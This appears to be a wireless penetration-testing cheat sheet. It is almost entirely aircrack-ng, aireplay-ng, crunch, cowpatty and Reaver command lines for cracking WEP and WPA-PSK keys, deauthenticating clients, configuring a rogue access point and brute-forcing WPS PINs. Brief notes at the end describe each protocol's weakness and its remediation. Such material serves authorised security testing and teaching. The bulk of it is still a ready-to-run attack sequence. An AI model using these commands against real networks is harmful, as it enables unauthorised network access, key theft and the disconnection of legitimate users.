WEP attack with aircrack-ng suite.
----------------------------------
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon
aireplay-ng -3 -b <AP MAC> -h <Attacker MAC> wlan0mon # ARP Replay
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> wlan0mon
aircrack-ng -0 <filename.cap>
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon
aireplay-ng -5 -b <AP MAC> -h <Attacker MAC> wlan0mon
packetforge-ng -0 -a <AP MAC> -h <Attacker MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <packet filename>
tcpdump -n -vvv -e -s0 -r <packet filename>
aireplay-ng -2 -r <packet filename> wlan0mon
aircrack-ng -0 <filename>
WPA PSK attack with aircrack-ng suite.
--------------------------------------
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0mon
aircrack-ng -0 -w <wordlist> <capture file>
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
CoWPAtty Attack
Wordlist mode:
cowpatty -r <Capture file> -f <wordlist> -2 -s <AP ESSID>
PMK mode:
genpmk -f <wordlist> -d <hash filename> -s <AP ESSID>
cowpatty -r <Capture file> -d <hash filename> -2 -s <AP ESSID>
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
ifconfig wlan1 down
iw reg set BO
ifconfig wlan1 up
iwconfig wlan1 channel 13
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
---------
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
--------------
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise